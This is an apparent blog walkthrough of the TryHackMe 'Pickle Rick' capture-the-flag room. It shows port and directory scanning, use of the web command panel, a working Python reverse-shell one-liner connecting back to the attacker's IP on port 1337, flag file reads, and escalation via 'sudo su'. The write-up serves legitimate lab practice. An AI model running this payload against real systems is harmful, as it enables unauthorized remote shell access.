Pickle Rick Walkthrough TryHackMe

Room link : https://tryhackme.com/room/picklerick

Pickle Rick
$ nmap IP -sV -T4Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–27 11:17 EDT
Nmap scan report for IP
Host is up (0.39s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.24 seconds
Website
Page Source
[11:27:52] 301–311B — /assets -> http://10.10.73.35/assets/
[11:27:53] 200–2KB — /assets/
[11:27:58] 200–1KB — /index.html
[11:28:00] 200–882B — /login.php
[11:28:05] 200–17B — /robots.txt
$ curl http://10.10.73.35/robots.txt
Wu....dub
login.php
Command Panel
Files
which python3
PayloadsAllTheThings
revshell code
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“yourtun0ip”,1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’
Rev shell success
www-data@ip-10–10–180–175:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
cat Sup3rS3cretPickl3Ingred.txt
mr. ........ hair
www-data@ip-10–10–180–175:/var/www/html$ cat clue.txt
cat clue.txt
Look around the file system for the other ingredient.
www-data@ip-10–10–180–175:/home$ ls 
ls
rick ubuntu
second ingredients
cat error
www-data@ip-10–10–180–175:/home/rick$ cat “second ingredients”
cat “second ingredients”
1 ..... tear
www-data@ip-10–10–180–175:/home/rick$ cd /root
cd /root
bash: cd: /root: Permission denied
sudo -l
sudo su
3rd.txt

Well done! We have solved the room!!

Hope you enjoyed the writeup!

Hi, I’m Aksheet. A young kiddo who is interested in Cyber Security. eJPT certified on 9th March 2021. Tryhackme Account : https://tryhackme.com/p/Aksheet